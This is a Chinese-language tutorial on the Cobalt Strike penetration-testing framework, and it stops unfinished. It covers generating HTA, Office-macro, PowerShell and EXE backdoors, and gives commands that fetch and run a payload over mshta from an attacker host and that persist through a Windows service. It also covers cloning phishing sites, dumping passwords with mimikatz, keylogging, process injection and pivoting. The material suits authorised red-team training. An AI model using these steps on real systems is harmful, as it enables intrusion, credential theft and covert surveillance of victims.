CobaltStrike
CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltSitrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
CobaliStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe木马生成,windows dll木马生成,java木马生成,office宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
启动
条件:需要jdk8版本
启动服务端: ./teamserver 192.168.41.138 123456
#192.168.41.138是kali的ip地址,123456是密码
后台运行,关闭当前终端依然运行:
nohup ./teamserver 192.168.10.11 123456 &
启动服务端
使用./start.sh
这里CobaltStrike默认监听的是50050端口,如果我们想修改这个默认端口的话,可以打开teamserver文件,将其中的50050修改成任意一个端口号。
启动成功:
使用
模块介绍
New Connection:
打开一个新连接窗口Preferences:
偏好设置,就是设置CobaltStrike外观的Visualization
:将主机以不同的权限展示出来(主要以输出结果的形式展示)。VPN Interfaces:
设置VPN接口Listeners
:创建监听器Script Interfaces:
查看和加载CNA脚本.Close:关闭
创建监听器
CobaltStrike的内置监听器为Beacon,外置监听器为Foreign。CobaltStrike的Beacon支持异步通信和交互式通信。
点击左上方CobaltStrike选项——>在下拉框中选择Listeners——>在下方弹出区域中单机add
name:为监听器名字,可任意
payload:payload类型
HTTP Hosts: shell反弹的主机,也就是我们kali的ip
HTTP Hosts(Stager): Stager的马请求下载payload的地址
HTTP Port(C2): C2监听的端口
payload形式
Attacks攻击(生成后门)
点击attacks->packages
四种后门方式:
1、HTML Application
生成一个恶意HTMLApplication木马,后缀格式为.hta。通过HTML调用其他语言的
应用组件进行攻击,提供了可执行文件、PowerShell、VBA三种方法。
2、MS Office Macro
生成office宏病毒文件;
3、Payload Generator
生成各种语言版本的payload,可以生成基于C、C#、COM Scriptlet、Java、Perl
PowerShell、Python、Ruby、VBA等的payload
4、Windows Executable
生成32位或64位的exe和基于服务的exe、DLL等后门程序
Windows Executable(S)
用于生成一个exe可执行文件,其中包含Beacon的完整payload,不需要阶段性的请
求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存。
HTML Application ,选择监听器。
创建好木马文件,点击钓鱼
选择Host File
执行: mshta http://192.168.41.129/download/file.ext
MS Office Macro
选择监听器,然后点击Copy Macro
然后打开word编辑器,点击视图,然后点击宏。
输入宏名,点击创建。
清除自带的代码,粘贴复制好的代码,保存退出。
将文档发给其他人,只要是她用word打开,并且开启了宏,我们的CS就会收到弹回来的shell,进程名是rundll32.exe
word开启禁用宏:文件-选项-信任中心-信任中心位置
Payload Generator
0x00 powershell
选择该payload会生成一个payload.ps1文件,可以选择如下方式上线。
powershell下:
Import-Module .\payload.ps1
或
.\payload.ps1
然后在靶机运行即可
cmd下:
powershell Import-Module .\payload.ps1
或
powershell .\payload.ps1
0x01 Powershell Command
选择该payload会生成一个payload.txt文件,可以选择如下方式上线:
直接复制该文件内容在cmd下运行即可上线。
Windows Executable & Windows Executable(S)
这两个模块直接用于生成可执行的exe 文件或dll 文件。Windows Executable是生成Stager类型的马,而Windows Executable(S)是生成Stageless类型的马。
Stager是分阶段传送Payload。
Windowss Executable(S)相比于Windows Executable,其中包含Beacon的完整payload,不需要阶段性的请求,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将StagelessPayload注入内存。
注意,生成的Windows Service EXE生成的木马,直接双击是不会返回session的。需要以创建服务的方式启动,才会返回session。
#注意,等号(=)后面要有空格
sc create autoRunBackDoor binPath= "cmd.exe /c C:\users\administrator\desktop\cs.exe" start= auto DisplayName= autoRunBackDoor
#开启某个系统服务
sc start autoRunBackDoor
#停止某个系统服务
sc stop autoRunBackDoor
# 删除某个系统服务
sc delete service_name
Attacks攻击(钓鱼攻击)
web服务管理:对开启的web服务进行管理;
克隆网站:克隆网站,可以记录受害者提交的数据;
文件下载:提供一个本地文件下载,可以修改Mime信息。可以配合DNS欺骗实现挂马效果使用
Scripted Web Delivery(S):基于Web的攻击测试脚本,自动生成可执行的payload,通常用这个模块来生成powershell命令反弹shell
签名Applet攻击:启动一个Web服务以提供自签名Java Applet的运行环境;
智能攻击:自动检测Java版本并利用已知的exploits绕过security;
信息搜集:用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。
克隆网站:
测试
然后访问URL
视图 --web log可以查看日志
信息收集
然后只要目标访问我们的这个链接,就会自动跳转到百度,并且我们的cs可以获取到目标系统和浏览器的信息。
视图view
Applications 显示受害者机器的应用信息;
Credentials 显示受害者机器的凭证信息,通过hashdump和mimikatz获取的密码都保存在这里;
Downloads 查看从被控机器上下载的文件;
Event Log 可以看到事件日志,清楚的看到系统的事件,并且团队可以在这里聊天;
Keystrokes 查看键盘记录;
Proxy Pivots 查看代理信息;
Screenshots 查看屏幕截图;
Script Console在这里可以加载各种脚本以增强功能,
脚本地址: https://github.comIrsmudge/cortana-scripts
targets 查看目标;
Web Log 查看web日志。
操控主机
Interact 打开beacon
Access
dump hashes 获取hash
Elevate 提权
Golden Ticket 生成黄金票据注入当前会话
MAke token 凭证转换
Run Mimikatz 运行 Mimikatz
Spawn As 用其他用户生成Cobalt Strike的beacon
Explore
Browser Pivot 劫持目标浏览器进程
Desktop(VNC) 桌面交互
File Browser 文件浏览器
Net View 命令Net View
Port scan 端口扫描
Process list 进程列表
Screenshot 截图
Pivoting
SOCKS Server 代理服务
Listener 反向端口转发
Deploy VPN 部署VPN
Spawn 新的通讯模式并生成会话
Session 会话管理,删除,心跳时间,退出,备注
抓取hash和dump明文密码
需要提权。
1、抓取密码哈希:右键被控主机–>Acess–>Dump Hashes
2、利用mimikatz抓取明文密码:右键被控主机–>Access–>Run Minikatz
也可以直接输入:hashdump
抓取密码哈希
或者使用:logonpasswords
抓取明文密码
抓取完之后,点击凭证信息,就会显示我们抓取过的哈希或明文。
提权(Elevate)
有两个payload可以使用。
我们选择相应的payload提权即可。
我们也可以自己加入一些提权脚本进去。
在Github上有一个提权工具包,使用这个提权工具包可以增加几种提权方法:https://github.com/rsmudge/ElevateKit。我们下载好该提权工具包后
load引入即可。
利用被控主机建立Socks4代理
当我们控制的主机是一台位于公网和内网边界的服务器,我们想利用该主机继续对内网进行渗透,于是,我们可以利用CS建立socks4A代理
右键被控主机——>Pivoting——>SOCKS Server
这里是SOCKS代理运行的端口,任意输入一个未占用的端口即可,默认CS会给我们一个,我们直接点击launch即可。
于是,我们在自己的主机上设置Socks4代理。代理ip是我们CS服务端的ip,端口即是35512。
如果我们想查看整个CS代理的设置,可以点击View——>Proxy Pivots
然后我们可以直接在浏览器设置socks4代理。
或者可以点击Tunnel,然后会给我们一个MSF的代理: setg Proxies socks4:xX.XX.XX.xX:35512
进程列表
右键被控主机——>Explore——>Process List
选中该进程,Kill为杀死该进程,Refresh为刷新该进程,Inject则是把beacon注入进程,Log Keystrokes为键盘记录,Screenshot为截图,Stea Token为窃取运行指定程序的用户令牌。
选择进程,点击lnject,随后选择监听器,点击choose,即可发现CobaltStrike弹回了目标机的一个新会话,这个会话就是成功注入到某进程的beacon会话。该功能可以把你的beacon会话注入到另外一个程序之中,注入之后,除非那个正常进程被杀死了,否则我们就—直可以控制该主机了。
任意选择一个进程,点击Log Keystrokes,即可监听该主机的键盘记录。
查看键盘记录结果:点击钥匙一样的按钮,就可以在底下看到键盘记录的详细了,会监听所有的键盘记录,而不只是选中的进程的键盘记录。
浏览器代理brower pivot
生成黄金票据注入当前会话
凭证转换
端口扫描
哈希传递攻击或ssh远程登录
导入并执行本地的powershell脚本
beacon tcp的使用
beacon smb的使用
cobaltstrike常见命令
未完